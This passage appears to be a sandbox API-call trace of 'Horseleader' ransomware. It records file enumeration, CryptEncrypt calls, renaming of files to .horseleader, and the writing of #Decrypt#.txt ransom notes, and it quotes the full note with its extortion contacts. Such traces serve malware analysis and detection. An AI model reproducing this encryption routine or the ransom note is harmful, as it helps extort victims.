yJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.794] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.794] CloseHandle (hObject=0x1a4) returned 1 [0244.794] GetProcessHeap () returned 0x780000 [0244.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.795] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0244.795] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0244.795] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en") returned 92 [0244.795] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0244.795] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0244.795] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.795] GetProcessHeap () returned 0x780000 [0244.795] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.796] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*") returned 94 [0244.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.797] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.797] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\.") returned 94 [0244.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.797] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.797] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.797] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\..") returned 95 [0244.797] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.797] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.797] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01be3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0244.798] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0244.798] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 102 [0244.798] StrStrIW (lpFirst="Proof.XML", lpSrch=".horseleader") returned 0x0 [0244.798] lstrcmpW (lpString1="Proof.XML", lpString2="#Decrypt#.txt") returned 1 [0244.798] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0244.798] lstrlenW (lpString=".testttjffg") returned 11 [0244.798] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML", lpSrch=".testttjffg") returned 0x0 [0244.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 102 [0244.799] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0244.799] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1347) returned 1 [0244.799] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x543, lpOverlapped=0x0) returned 1 [0244.805] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.805] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x543, lpOverlapped=0x0) returned 1 [0244.805] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.805] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.805] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.806] CloseHandle (hObject=0x15c) returned 1 [0244.806] GetProcessHeap () returned 0x780000 [0244.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.806] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.horseleader") returned 114 [0244.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.horseleader")) returned 1 [0244.807] GetProcessHeap () returned 0x780000 [0244.807] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.807] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01be3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 0 [0244.807] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.807] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\#Decrypt#.txt") returned 106 [0244.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.808] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.808] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.809] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.809] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.809] CloseHandle (hObject=0x1a4) returned 1 [0244.809] GetProcessHeap () returned 0x780000 [0244.809] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.809] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0244.809] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0244.810] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es") returned 92 [0244.810] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0244.810] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0244.810] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.810] GetProcessHeap () returned 0x780000 [0244.810] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.810] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*") returned 94 [0244.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.811] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\.") returned 94 [0244.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.811] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.812] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\..") returned 95 [0244.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.812] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e37e00, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0244.812] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0244.812] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 102 [0244.812] StrStrIW (lpFirst="Proof.XML", lpSrch=".horseleader") returned 0x0 [0244.812] lstrcmpW (lpString1="Proof.XML", lpString2="#Decrypt#.txt") returned 1 [0244.812] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0244.812] lstrlenW (lpString=".testttjffg") returned 11 [0244.812] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML", lpSrch=".testttjffg") returned 0x0 [0244.812] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.812] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 102 [0244.814] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0244.814] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1457) returned 1 [0244.814] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5b1, lpOverlapped=0x0) returned 1 [0244.816] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.816] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5b1, lpOverlapped=0x0) returned 1 [0244.816] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.816] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.816] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.817] CloseHandle (hObject=0x15c) returned 1 [0244.817] GetProcessHeap () returned 0x780000 [0244.817] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.817] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.horseleader") returned 114 [0244.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.horseleader")) returned 1 [0244.818] GetProcessHeap () returned 0x780000 [0244.818] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.818] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e37e00, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 0 [0244.818] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.818] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\#Decrypt#.txt") returned 106 [0244.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.818] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.818] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.820] lstrlenA 